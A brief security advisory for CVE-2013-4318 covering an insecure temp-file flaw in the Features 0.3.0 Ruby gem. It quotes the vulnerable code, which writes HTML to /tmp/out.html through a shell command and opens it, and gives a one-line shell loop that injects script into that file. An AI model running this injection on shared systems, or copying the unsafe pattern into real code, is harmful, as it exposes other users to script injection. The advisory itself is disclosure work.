Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0
CVE: 2013-4318
Download: http://rubygems.org/gems/features

Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"

Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html

By a malicious user creating /tmp/out.html first and repeatedly writing to it they can inject malicious html into the file right before it is about to be opened.

PoC:

nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done

Will pop up a java script alert in other gem users browser.
Code:

+--------------------[./features-0.3.0/lib/suite.rb]-------------------+

html = parse_results(results).html

%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end

def parse_results_and_open_in_safari(results) -- end

def open_in_safari(html)
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end

Vendor: Not notified